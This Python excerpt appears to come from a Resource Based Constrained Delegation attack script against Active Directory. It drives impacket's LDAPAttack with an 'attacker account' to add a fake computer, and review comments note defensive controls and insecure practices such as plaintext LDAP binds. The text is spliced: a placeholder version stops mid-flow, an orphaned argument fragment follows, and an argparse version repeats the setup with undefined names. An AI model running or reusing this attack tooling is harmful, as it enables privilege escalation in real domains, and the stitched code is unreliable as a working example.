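# NOTE(review): ldap3 is referenced below (ldap3.Server, ldap3.Connection) but no
# `import ldap3` is visible in this excerpt -- confirm it is imported elsewhere.
import ldapdomaindump
from impacket import logging
from impacket.examples import logger
from impacket.examples.ntlmrelayx.attacks.ldapattack import LDAPAttack
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig

# Defensive context: the visible lines only fill in a relay configuration and
# open an LDAP session; whatever consumes them lies outside this excerpt.
# RBCD abuse in general depends on write access to the target computer object
# and on the ability to add a machine account, so auditing changes to
# msDS-AllowedToActOnBehalfOfOtherIdentity and lowering ms-DS-MachineAccountQuota
# are the usual controls.

# Placeholder inputs; every value has to be replaced before the script can run.
# NOTE(review): the account password lives in the source file, so a filled-in
# copy leaks it through version control, backups and file shares.
attackeraccount = ('DOMAIN\\USER', 'PASSWORD')
fakecomputer = 'FAKE_COMPUTER_NAME'
targetcomputer = 'TARGET_COMPUTER_NAME'
dc = 'DC_IP'

# Computer accounts are addressed by sAMAccountName: host name plus a trailing '$'.
targetsam = targetcomputer + '$'
fakecomputersam = fakecomputer + '$'

# Configuration object for the impacket LDAP attack code; only these two fields
# are set in the visible lines.
c = NTLMRelayxConfig()
c.addcomputer = fakecomputer
c.target = dc

logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info('Starting Resource Based Constrained Delegation Attack against {}'.format(targetsam))
logging.info('Initializing LDAP connection to {}'.format(dc))

# A commented-out ldap3.Tls(validate=ssl.CERT_NONE, ...) setup used to sit here;
# it was never wired in, and CERT_NONE would have skipped certificate validation.
# NOTE(review): with tls=False and use_ssl left at its default the session is
# plain LDAP, so the SIMPLE bind below sends the password unencrypted.
serv = ldap3.Server(dc, tls=False, get_info=ldap3.ALL)

# The password is masked in the log line on purpose; keep it that way.
logging.info('Using {} account with password ***'.format(attackeraccount[0]))
conn = ldap3.Connection(
    serv,
    user=attackeraccount[0],
    password=attackeraccount[1],
    authentication=ldap3.SIMPLE,
)

# bind() returns False on a rejected bind unless the connection was created with
# raise_exceptions=True, so the result must be checked before reporting success.
if not conn.bind():
    logging.error('LDAP bind failed: {}'.format(conn.result))
    raise SystemExit(1)
logging.info('LDAP bind OK')
logging.info('Initializing domainDumper()')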
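help='domain\\username:password, attacker account with write access to target computer properties (NetBIOS domain name must be used!)'
)
# NOTE(review): the two lines above close a parser.add_argument(...) call whose
# opening lies outside this excerpt; they are reproduced unchanged.

# With no arguments at all, show usage plus a worked example and stop.
# NOTE(review): the identity argument carries the password on the command line,
# where it is visible in process listings and shell history.
if len(sys.argv) == 1:
    parser.print_help()
    print('\nExample: ./rbcd.py -dc-ip 10.10.10.1 -t WEB -f FAKECOMP ECORP\\test:Spring2020')
    sys.exit(1)

options = parser.parse_args()

# Split on the first ':' only, so a password that itself contains ':' is kept
# whole instead of being silently truncated.
attackeraccount = options.identity.split(':', 1)

# Configuration object for the impacket LDAP attack code; only these two fields
# are set in the visible lines.
c = NTLMRelayxConfig()
c.addcomputer = options.f
c.target = options.dc_ip

if options.hashes:
    # support only :NTHASH format (no LM); the fixed prefix is the LM hash of an
    # empty password, used as a filler for the LM half.
    attackerpassword = ("aad3b435b51404eeaad3b435b51404ee:" + options.hashes.split(":")[1]).upper()
elif len(attackeraccount) < 2:
    # Without this guard a missing ':password' part surfaced as a bare IndexError.
    parser.error('identity must contain a password (domain\\username:password) unless hashes are supplied')
else:
    attackerpassword = attackeraccount[1]

logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info(
    'Starting Resource Based Constrained Delegation Attack against {}$'.format(options.t)
)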